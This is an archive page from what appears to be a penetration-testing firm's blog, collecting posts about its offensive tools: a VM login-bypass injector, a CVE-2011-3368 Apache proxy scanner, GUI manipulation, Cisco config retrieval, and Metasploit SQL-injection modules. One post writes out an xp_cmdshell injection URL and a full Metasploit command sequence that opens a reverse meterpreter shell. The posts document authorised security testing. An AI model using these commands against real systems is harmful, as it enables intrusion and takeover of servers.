Blog ■

Home : Blog

Archive for the ‘Tools’ Category

	VMInjector - DLL Injection tool to unlock guest VMs Wednesday, November 14th, 2012 Overview: VMInjector is a tool designed to bypass OS login authentication screens of major operating systems running on VMware Workstation/Player, by using direct memory manipulation. Description: VMInjector is a tool which manipulates the memory of VMware guests in order to bypass the operation system authentication screen. VMware handles the resources allocated to guest operating systems, including RAM memory. VMInjector injects a DLL library into the VMWare process to gain access to the mapped resources. The DLL library works by parsing memory space owned by the VMware process and locating the memory-mapped RAM file, which corresponds to the guest’s RAM image. By manipulating the allocated RAM file and patching the function in charge of the authentication, an attacker gains unauthorised access to the underlying virtual host. VMInjector can currently bypass locked Windows, Ubuntu and Mac OS X operation systems. The in-memory patching is non-persistent, and rebooting the guest virtual machine will restore the normal password functionality. Attacking Scenarios: VMInjector can be used if the password of a virtual host is forgotten and requires reset. Most usually, this tool can be used during penetration testing activities, when access to a VMWare host is achieved and the attacker is looking to gain additional access to the guests running in such host. Requirements: Windows machine (with administrative access); VMware workstation or player edition; A locked guest VM; Usage: VMInjector consists of 2 parts: The DLL injection application (python script or provided converted executable) DLL library (x86 and x64) The tool supports both x86 and x64 bit architectures by providing both DLLs. One may use his own DLL injector to select the guest virtual machine running on the host. In order to run the tool, execute the VMInjector (32 or 64) executable provided from the command line as shown in figure 1. Figure 1: List of running guest machines running. VMWare runs each guest in a different process. VMInjector needs to be pointed to the process running the guest which requires bypass. Once the user chooses a process, it will inject the DLL into the chosen target. Once the DLL is injected, the user will need to specify the OS, so that the memory patching can be accomplished, as shown in Figure 2. Figure 2: Searching for OS signature in memory and patching. Tool and Source Code: The tool executable and source code can be found on GitHub (https://github.com/batistam/VMInjector) Disclaimer: This tool is for legal purposes only. The code is released under GPLv3 license. Thanks and references: I would like to thank Michael Ligh for his valuable research on injecting shellcode into guest virtual machines back in 2006. I would also like to thank Carsten Maartmann-Moe for is work on Inception, a tool which can unlock locked Windows, Ubuntu and OS X machines by using the IEEE 1394 FireWire trick. This was first showcased by the (now obsolete) winlockpwn tool. Credits: Tool coded by Marco Batista Download: Please download this tool from GitHub Tags: Penetration Testing, VMInjector, VMWare, VMWare security Posted in Penetration Testing, Security research, Tools \| No Comments »
	CVE-2011-3368 PoC - Apache Proxy Scanner Monday, October 10th, 2011 A recent Apache vulnerability has been made public whereby an attacker could gain unauthorised access to content in the DMZ network: The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial @ (at sign) character. SECFORCE has developed a proof of concept for this vulnerability, available for download from our security tools section on our website. The script exploits the vulnerability and allows the user to retrieve arbitrary known files from the DMZ. The tool can also be used to perform a port scan of the web server using the Apache proxy functionality, and therefore bypassing any firewall. The following output shows the usage of the tool: python apache_proxy_scanner.py CVE-2011-3368 proof of concept by Rodrigo Marcos http://www.secforce.co.uk usage(): python apache_scan.py [options] [options] -r: Remote Apache host -p: Remote Apache port (default is 80) -u: URL on the remote web server (default is /) -d: Host in the DMZ (default is 127.0.0.1) -e: Port in the DMZ (enables 'single port scan') -g: GET request to the host in the DMZ (default is /) -h: Help page examples: - Port scan of the remote host python apache_scan.py -r www.example.com -u /img/test.gif - Port scan of a host in the DMZ python apache_scan.py -r www.example.com -u /img/test.gif -d internalhost.local - Retrieve a resource from a host in the DMZ python apache_scan.py -r www.example.com -u /img/test.gif -d internalhost.local -e 80 -g /accounts/index.html The tool can be used to perform a portscan of the target host in the following way: python apache_proxy_scanner.py -r <target> -u <uri> The following screenshot shows the result of the command above: Apache proxy port scan results The script can be used to perform a bounce scan of a host in the DMZ or in the Internet: python apache_proxy_scanner.py -r 192.168.85.161 -u /rewrite/test -d internalhost python apache_proxy_scanner.py -r 192.168.85.161 -u /rewrite/test -d www.example.com Apache_proxy_scanner will report open/filtered/closed ports in internal and external hosts. Tags: Apache, apache_proxy_scanner, CVE-2011-3368, mod_proxy, mod_rewrite, Penetration Testing, PoC, SECFORCE Posted in Penetration Testing, Tools, Vulnerabilities \| No Comments »
	GUI manipulation and penetration testing Friday, July 15th, 2011 Whilst in the web application development world it is becoming very well understood that “you should never trust the data from the client side”, this is not always the case in local applications. In web environments any restriction enforced at the client side can be easily bypassed with the use of a web proxy. However, security mechanisms enforced in desktop applications sometimes can be manipulated to perform unauthorised actions. During a recent penetration test we found a desktop application which needed to be assessed in regard to security. GUI manipulation was used to conduct a number of attacks. The tool of choice for this particular attack was “DARKER’s Enabler“: Denabler used for GUI manipulation DARKER’s enabler is a tool which allows showing and enabling objects in Windows applications. The application to be tested had a number of disabled fields that required to be modified for the purpose of the penetration test. Specifically the “Encrypt” checkbox needed to be unchecked, however the application showed the field disabled: Original application window With Denabler we dragged-and-dropped the red square to the target application in order to identify de Windows handler of the field and then enabled it: Denabler in action The action enabled the field and allowed the penetration testers to disable the encryption in the application, which resulted vital in the outcome of the penetration test: Window after enabling the fields As shown above, GUI manipulation can lead to unwanted consequences. Extra caution needs to be exercised during the planning and development process to minimize the risk of GUI manipulation. Tags: application manipulation, application penetration testing, application security, Denabler, desktop security, GUI, gui manipulation, gui penetration test, Penetration Testing Posted in Penetration Testing, Tools \| No Comments »
	SECFORCE invited to present at Athcon Saturday, June 18th, 2011 SECFORCE was invited to present at Athcon conference, held in Athens during 2nd and 3rd June 2011. AthCon is an annual IT security conference that takes place in Athens Greece designed to give a technical insight to the world of IT security. A realistic, practical view of current and evolving threats and security trends presented by top international security experts. SECFORCE presented a talk called “What you didn’t know about Metasploit”, covering the history of the Metasploit Framework, architecture, exploitation and post-exploitation features. The Metasploit Framework is mainly used for exploitation purposes during penetration testing engagements. You can download the slides from the talk from our security research area. Tags: Athcon, exploitation, metasploit, Penetration Testing, post-exploitation, presentations Posted in Penetration Testing, SECFORCE, Tools \| No Comments »
	Exploiting SQL injection vulnerabilities with Metasploit Thursday, January 27th, 2011 In this post we are going to show how to exploit a SQL injection vulnerability on a web application using Microsoft SQL server backend where xp_cmdshell is available to the attacker. Given a penetration test to a web application it is identified that it is vulnerable to SQL injection attacks and the penetration tester can execute administrative stored procedures: http://192.168.1.66/showproduct.asp?id=1;exec master..xp_cmdshell ‘ping 192.168.1.64′;– If the request shown above is successful then arbitrary commands could be executed in the host. At this point, there are a number of options that would allow the tester to fully compromise the server. There are public tools which could aid the attacker to automate the take over process. This post will cover the use of a Metasploit module. The mssql_payload_sqli module will execute any Windows payload on the target host. In this example we will execute meterpreter which is one of the payloads that offers great flexibility to the penetration tester. It is necessary to specify the exact point where the SQL injection vulnerability is. We do that by entering the GET_PATH variable with an [SQLi] token. The token will be the place where the payload will be executed. The rest of the exploitation process is the same as any other vulnerability, this is the exploitation based on the URL shown above: msf > use windows/mssql/mssql_payload_sqli msf exploit(mssql_payload_sqli) > set GET_PATH http://192.168.1.66/ showproduct.asp?id=1;[SQLi];-- GET_PATH => http://192.168.1.66/ showproduct.asp?id=1;[SQLi];-- msf exploit(mssql_payload_sqli) > set RHOST 192.168.1.66 RHOST => 192.168.1.66 msf exploit(mssql_payload_sqli) > set PAYLOAD windows/patchupmeterpreter/reverse_tcp PAYLOAD => windows/patchupmeterpreter/reverse_tcp msf exploit(mssql_payload_sqli) > set LHOST 192.168.1.64 LHOST => 192.168.1.64 msf exploit(mssql_payload_sqli) > set LPORT 80 LPORT => 80 msf exploit(mssql_payload_sqli) > exploit After the exploitation the attacker will get a meterpreter shell. SQL injection exploitation with Metasploit If you want to use this code you can download it from Secforce security tools repository. Tags: exploitation, metasploit, ms sql server, Penetration Testing, sql injection Posted in Penetration Testing, SECFORCE, SQL Server, Tools, Vulnerabilities, exploit, sql injection \| No Comments »
	Exploiting MS09-004 via SQL injection Monday, January 24th, 2011 Recently we were performing an web application penetration test to one of our clients and identified a SQL injection vulnerability. The vulnerability allowed us to conduct a degree of fingerprinting on the remote server; however, the Microsoft SQL Server back-end database didn’t allow to execute commands via the well known xp_cmdshell stored procedure. Based on the fingerprinting information we identified that the database server was running an old and vulnerable version of MS SQL server. Microsoft SQL Sever 2000 SP3, to be precise. All indicated that the server was vulnerable to MS09-004 vulnerability. However, it was not possible to get direct access to the database. Moreover no authentication credentials were discovered during the course of the assessment. This is how our newly released Metasploit module was born. We coded an extension which can be added to Metasploit to exploit this vulnerability using a SQL injection vulnerability with no need of using credentials, as the web application will authenticate in our behalf. Penetration testing - SQL injection exploitation The screenshot above shows how to get meterpreter (or any other payload of your choice) exploiting the vulnerability from Metasploit. If interested, get the scripts from our security tools area. Tags: exploitation, metasploit, MS09-004, SECFORCE, sql injection, Tools Posted in Penetration Testing, Tools, exploit \| No Comments »
	Metasploit and SQL injection Monday, January 17th, 2011 SECFORCE has released a set of scripts for enhancing Metasploit functionality exploiting SQL injection vulnerabilities. This is particularly useful in two scenarios: When an attacker achieves command execution on a database via SQL injection, but he wants all the functionality offered by Metasploit. The attacker identifies that the backend SQL server is vulnerable to MS_09004 but has no credentials or direct access to the database. The scripts can be retrieved from our security research page. Tags: metasploit, MS09004, Penetration Testing, sql injection, Tools Posted in Penetration Testing, SECFORCE, Tools \| No Comments »
	Cisco config retrieval tool and password reuse Wednesday, October 8th, 2008 The other day we were at a client site doing a penetration test. This was a very big deployment with almost 100 routers. At some point during the test we managed to get the read/write community string of one of the routers, as there was a script with the hard-coded credentials. We managed to connect to the router with the SNMP credentials and pulled the Cisco config file. After that, we decoded the telnet and enable passwords and we were ready to go. We tried (with no much hope initially) a couple of other routers reusing the telnet password and they all worked. Every single router was protected with exactly the same password. We had limited time and the prospect of telneting 100 routers pulling config files was not very appealing so we wrote a nice python script to pull them for us. We released the tool in our research section, so check it out if you are interested. The lesson to learn here is that no matter how confident you are about the strength of your password because it can be potentially compromise and if you are reusing it, the impact for the business becomes critical. Tags: cisco, cisco config, Penetration Testing, Tools Posted in Penetration Testing, Tools \| No Comments »